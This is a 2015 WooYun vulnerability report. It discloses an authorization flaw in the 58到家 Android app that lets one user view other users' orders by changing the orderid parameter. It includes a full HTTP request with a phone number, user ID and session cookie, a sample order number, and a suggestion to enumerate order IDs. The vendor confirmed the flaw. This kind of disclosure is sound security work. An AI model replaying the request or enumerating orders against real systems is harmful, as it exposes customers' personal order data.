当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131559

漏洞标题:APP之58到家安卓端两处缺陷

相关厂商:58同城

漏洞作者: BMa

提交时间:2015-08-04 16:33

修复时间:2015-09-19 14:56

公开时间:2015-09-19 14:56

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-05: 厂商已经确认,细节仅向厂商公开
2015-08-15: 细节向核心白帽子及相关领域专家公开
2015-08-25: 细节向普通白帽子公开
2015-09-04: 细节向实习白帽子公开
2015-09-19: 细节向公众公开

简要描述:

app之58到家安卓端两处缺陷--我是来帮司马加薪的

详细说明:

1.查看订单订单处

0.jpg


原本当前用户的订单;

1.jpg


另外一个用户的订单:

2.jpg


不遍历, 反正订单号有规律+数字 证明这里权限控制失误就ok
如果要验证,提供一个订单号:
orderid=50164000853068

漏洞证明:

2.

GET /api/h5/wipeglass/orderdetail?from=ios&cityId=1&mobile=13184390435&uid=628450255477809152&ver=3.1.2&hmsr=ios&cityid=1&orderid=50165131454068&direction=0 HTTP/1.1
Host: jzt2.58.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: JSESSIONID=27BC3A0566640A6156D101A28F6575F7; id58=05dz8FXAWI8z5xxhA8WZAg==
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 58daojia/3.1.2
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Connection: keep-alive


遍历orderid即可 以两个不同用户的订单证明

0.jpg


2.jpg


3.jpg


修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-08-05 14:55

厂商回复:

确认漏洞存在,感谢反馈提交!

最新状态:

暂无